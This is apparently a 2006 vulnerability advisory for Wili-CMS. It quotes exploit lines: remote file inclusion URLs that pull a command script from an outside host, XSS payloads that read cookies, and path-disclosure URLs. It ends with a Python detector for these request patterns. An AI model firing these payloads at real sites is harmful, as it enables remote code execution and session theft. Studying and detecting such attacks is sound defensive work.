Vendor: Wili-CMS
By: HACKERS PAL
CVSS: 8,8 (HIGH)
Remote include, XSS, Full Path Disclosure
CWE: 79, 89, 200
Product Name: Wili-CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Wili-CMS Multiple Input Validation Vulnerabilities

Wili-CMS is vulnerable to multiple input validation vulnerabilities. These vulnerabilities include remote include, XSS, and full path disclosure. An attacker can exploit these vulnerabilities to gain access to sensitive information, execute arbitrary code, and gain access to the underlying system.

Mitigation:

The vendor has released a patch to address these vulnerabilities. It is recommended that users update to the latest version of Wili-CMS.
Source

Exploit-DB raw data:

Wili-CMS Multiple Input Validation Vulnerabilities

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


Remote include
example-view/templates/article.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?
example-view/templates/root.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?
example-view/templates/dates_list.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?


XSS
http://localhost/vul/wili-cms/relocate.php?<script>alert(document.cookie);</script>
http://localhost/vul/wili-cms/example-view/inc/print_button.php?globals[pageid]="><script>alert(document.cookie);</script>


Full path
thumbnail.php?filename=global_variables.php
functions/admin/all.php
functions/admin/init_session.php
functions/all.php
example-view/admin_templates/ any_file.php

and many other Xss and Full path vulnerabilities
#WwW.SoQoR.NeT

# milw0rm.com [2006-09-21]
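
A defender's view of the request patterns listed above, as an added example that is not part of the original advisory or of Wili-CMS: it flags query strings that supply a `globals[...]` parameter, a remote URL inside such a parameter, or HTML markup. The sample request targets are constructed, and treating every client-supplied `globals[...]` key as suspicious is an assumption of this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample request targets (path + query), not taken from a real log.
SAMPLE_REQUESTS = [
    "/example-view/templates/article.php?globals[content_dir]=http://files.example/inc.txt?",
    "/example-view/inc/print_button.php?globals[pageid]=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/relocate.php?<script>alert(1)</script>",
    "/index.php?page=news&id=12",
    "/example-view/templates/root.php?globals%5Bcontent_dir%5D=content/",
]

# Assumption: no legitimate client sends a globals[...] key, so any use is flagged.
GLOBALS_KEY = re.compile(r"^globals\[[^\]]*\]$", re.I)
# A value that starts with a URL scheme points the include at another host.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)
# Start of an HTML tag anywhere in the decoded query string.
MARKUP = re.compile(r"<\s*/?\s*[a-z]", re.I)


def classify(request_target):
    """Return the sorted findings for one request target (path?query)."""
    findings = set()
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes keys and values, so globals%5B...%5D is caught too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if GLOBALS_KEY.match(key):
            findings.add("globals-override")
            if REMOTE_URL.match(value):
                findings.add("remote-include")
    # Markup can sit in a value or in a bare query string with no key at all.
    if MARKUP.search(unquote(query)):
        findings.add("xss-markup")
    return sorted(findings)


def scan(request_targets):
    """Map each flagged request target to its findings; clean ones are omitted."""
    report = {}
    for target in request_targets:
        findings = classify(target)
        if findings:
            report[target] = findings
    return report


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(", ".join(findings), "<-", target)
```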